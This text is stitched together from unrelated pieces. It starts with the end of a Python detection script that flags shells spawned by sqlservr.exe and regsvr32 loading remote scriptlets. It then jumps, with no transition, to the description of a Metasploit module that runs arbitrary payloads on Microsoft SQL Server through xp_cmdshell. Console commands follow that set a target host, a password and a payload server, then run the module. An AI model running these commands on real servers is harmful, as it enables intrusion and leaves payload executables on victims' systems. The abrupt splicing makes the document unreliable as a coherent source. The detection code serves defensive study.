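    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path).lower()


def triage(events):
    """Return (event index, reasons) for every suspicious event."""
    alerts = []
    for index, event in enumerate(events):
        reasons = []
        if name(event["parent"]) == "sqlservr.exe" and name(event["image"]) in SHELLS:
            reasons.append("shell spawned by sqlservr.exe")
        if REMOTE_SCRIPTLET.search(event["cmd"]):
            reasons.append("regsvr32 loading a remote scriptlet")
        if reasons:
            alerts.append((index, reasons))
    return alerts


if __name__ == "__main__":
    for index, reasons in triage(EVENTS):
        print(index, EVENTS[index]["cmd"], reasons)
```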


This module executes an arbitrary payload on a Microsoft SQL Server by using the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wscript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.
use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set rhost 192.168.1.104
msf exploit(mssql_payload) > set password admin123
msf exploit(mssql_payload) > set srvhost 192.168.1.115
msf exploit(mssql_payload) > run